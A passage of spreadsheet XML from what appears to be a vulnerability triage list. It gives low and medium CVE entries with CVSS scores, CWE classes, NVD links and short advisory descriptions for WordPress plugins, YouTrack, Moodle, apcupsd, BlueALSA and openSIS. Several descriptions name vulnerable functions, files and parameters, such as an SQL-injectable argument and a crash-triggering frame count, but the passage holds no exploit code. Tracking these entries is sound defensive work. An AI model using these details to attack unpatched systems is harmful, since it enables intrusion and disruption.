      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in Prevent files / folders access &lt;= 2.6.7 versions.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97267</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96825</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>Subscriber Bypass Vulnerability in All In One WP Security &amp; Firewall &lt;= 5.4.8 versions.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96825</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102137</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could bypass the content validation applied to an administrative file upload and store a file containing dangerous content on the appliance. This did not by itself result in code execution, which would require a separate vulnerability to run the stored file.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102137</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103533</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>github, php, requests, hp</t>
        </is>
      </c>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in David-Crty databasement up to 1.7.1. This impacts the function https:/github.com/David-Crty/databasement/pull/511 of the file app/Http/Requests/Api/V1/RestoreRequest.php of the component database-servers API Endpoint. The manipulation of the argument schema_name results in path traversal. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been made public and could be used. Upgrading to version 1.7.2 will fix this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103533</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103436</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>apcupsd through 3.14.14 discloses uninitialized stack memory in getupsvar() in src/cgi/upsfetch.c (used by upsstats.cgi, multimon.cgi, and upsfstats.cgi. On the single-field path, when the matched STATUS line has fewer than three whitespace-separated tokens, sscanf("%*s %*s %s", answer) performs no assignment but the function returns success, and thus the caller prints the uninitialized destination buffer into the HTTP response.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103436</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101887</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>BlueALSA (bluez-alsa/bluealsad) contains a division-by-zero vulnerability in the LC3plus sink decoder (a2dp-lc3plus.c, a2dp_lc3plus_dec_thread) that allows a Bluetooth-adjacent attacker to crash the daemon by sending a crafted RTP media header with an attacker-controlled frame count field set to zero. Attackers can establish an A2DP source connection with an LC3plus session negotiated against a victim running bluealsad as an A2DP sink and transmit a non-fragmented LC3plus media header with a zero frame count to trigger a SIGFPE in the decoding thread, causing a denial of service on builds compiled with LC3plus support enabled.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101887</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100270</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 low-level Admin Read permission users could disclose integration credentials via import configurations</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100270</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102138</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator on a node with an optional, separately licensed gateway role enabled could supply a connector URL that the server retrieved without sufficient validation of its scheme or destination, causing the server to issue requests to internal network services. Exploitation requires the licensed gateway role to be active.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102138</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100280</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 creating a project from an unreadable custom template was possible</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100280</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100264</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 stored SMTP server credentials could be disclosed by changing the server host</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100264</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100271</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 missing authorisation on several endpoints allowed authenticated users to access information from other projects</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100271</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102583</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An incorrect capability check in the artificial intelligence (AI) editor placement's image generation web service allows an authenticated user to invoke the feature without holding the required capability. This flaw permits unauthorized users to access and utilize the AI image generation functionality.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102583</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102587</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. User list filters do not properly enforce visibility restrictions on user profile fields. An authorized user with manager privileges can filter user lists using profile attributes they are not permitted to view directly, resulting in unauthorized information disclosure by inferring hidden user data.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102587</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27085</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>Shop manager Content Injection in Astra WordPress Theme &lt;= 4.13.12 versions.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27085</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102580</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. An authenticated attacker can supply an improperly validated audience class name to the Report Builder component, allowing arbitrary class instantiation. This vulnerability enables the unauthorized creation of internal program objects, which may result in unexpected application behavior.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102580</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102582</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. The manual enrolment management page did not properly check whether the manual enrolment plugin was disabled, allowing users with enrolment permissions to access the page directly by navigating to its URL. Consequently, an authorized user could manage manual enrolments even after an administrator disabled the feature in the user interface.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102582</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103114</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in OS4ED openSIS-Classic up to 9.3. The impacted element is the function DBQuery_assignment of the file modules/grades/Assignments.php of the component Assignment Management Endpoint. The manipulation of the argument Tables leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103114</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
